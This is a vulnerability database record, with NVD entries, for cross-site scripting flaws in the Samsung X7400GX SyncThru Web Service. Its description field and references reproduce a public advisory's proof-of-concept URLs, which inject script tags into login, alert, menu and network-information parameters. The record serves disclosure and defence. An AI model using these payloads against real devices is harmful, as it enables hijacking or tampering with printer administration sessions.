"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0464",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:samsung:syncthru_web_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:x7400gx_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7421",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-7421",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158856",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-7421",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7421",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7421",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158856",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7421",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158856",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"id": "VAR-201903-0464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:08.701000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.samsung.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89375"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.8,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.7,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158856"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"date": "2019-03-21T16:01:13.063000",
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158856"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002760"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-577"
},
{
"date": "2024-11-21T04:48:11.733000",
"db": "NVD",
"id": "CVE-2019-7421"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002760"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-577"
}
],
"trust": 0.7
}
}
Vulnerability from fkie_nvd
Published
2019-03-21 16:01
Modified
2024-11-21 04:48
Severity ?
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple parameters: contextpath and basedURL.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| cve@mitre.org | http://www.samsungprinter.com/ | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.samsungprinter.com/ | Product |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| samsung | syncthru_web_service | - | |
| samsung | x7400gx_firmware | 6.a6.25 | |
| samsung | x7400gx | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:syncthru_web_service:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E83D6AD7-E2AB-4220-B2EB-9D640B43F05B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:samsung:x7400gx_firmware:6.a6.25:*:*:*:*:*:*:*",
"matchCriteriaId": "183B174C-EEA6-4768-9D4B-33AFC08E922D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:samsung:x7400gx:-:*:*:*:*:*:*:*",
"matchCriteriaId": "28A60871-9265-46CD-973F-60891F7E6781",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.login/gnb/loginView.sws\" in multiple parameters: contextpath and basedURL."
},
{
"lang": "es",
"value": "Existe Cross-Site Scripting (XSS) en SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 en \"/sws.login/gnb/loginView.sws\" en m\u00faltiples par\u00e1metros: contextpath y basedURL."
}
],
"id": "CVE-2019-7421",
"lastModified": "2024-11-21T04:48:11.733",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-03-21T16:01:13.063",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://www.samsungprinter.com/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-03-21 16:01
Modified
2024-11-21 04:48
Severity ?
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://seclists.org/fulldisclosure/2019/Feb/28 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.samsung.com/Support/ProductSupport/download/index.aspx | Product | |
| cve@mitre.org | http://www.samsungprinter.com/ | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | Exploit, Third Party Advisory, VDB Entry | |
